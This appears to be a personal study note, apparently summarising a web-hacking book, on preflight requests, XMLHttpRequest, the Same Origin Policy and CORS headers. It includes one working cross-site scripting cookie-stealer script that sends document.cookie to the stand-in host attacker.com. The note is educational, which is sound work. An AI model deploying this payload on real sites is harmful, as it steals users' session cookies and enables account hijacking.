This is just my understanding of what I read throughout the book. It may not be perfect information, and I advise you to do your own research on anything that is not properly understood or seems "off".
A preflight request is a small request that is sent by the browser before the actual request (this is most commonly used with the XHR Object). It contains information like which HTTP method is used, as well as if any custom HTTP headers are present.
The XML HTTP Request object allows for asynchronous background web requests and also non-GET methods (such as POST requests). This can of course be very handy when making certain silent web hacking payloads such as an XSS silent cookie stealer.
<script> var xhr = new XMLHttpRequest(); var url_to_use = "http://attacker.com/cookies=" + document.cookie; xhr.open('GET', url_to_use, true); xhr.send(); </script>
CORS (Cross Origin Resource Sharing)
Web developers feel the need to push the boundaries of certain browser capabilities, to allow the webapps to come as close as possible to a "native" application through the browser.
One of the capabilities is the Same Origin Policy, which was also one of the few security mechanisms implemented into the first browsers. Developers often have legitimate reasons for wanting to relax the Same Origin Policy, for example if they want to be able to spread a site across multiple domains or just make interactions between unrelated domains possible.
Browser request CORS headers (3)
HeaderWhat does it do?OriginTellllThe scheme/host/port of the resource making the initial request. The sharing to this should be granted by the server. The whole point of this header is to ensure the request is coming from an uncompromised browser, and the value is set exactly by the browser, and can not be modified by HTML, JS or plugins.Access-Control-Request-MethodThis header is used in preflight requests to find out whether or not the server will follow the methods that XHR wants to use.Access-Control-Requetst-HeadersThis header is also used in preflight requests to find out if the server will follow any additional headers that XHR wants to use.
Server request CORS headers (6)
Sharing resources cross-origin has to be allowed by the server, and access to responses from the server will always be restricted to the Same Origin Policy unless the response specifies otherwise with a (or multiple) CORS header(s). These headers are known as Access-Control-Headers, and are returned in the servers response. The clients browser also sends certain headers to facilitate security. Furthermore, a browser may use a preflight request in certain situations to establish the CORS policy, this is generally used for the XHR Object.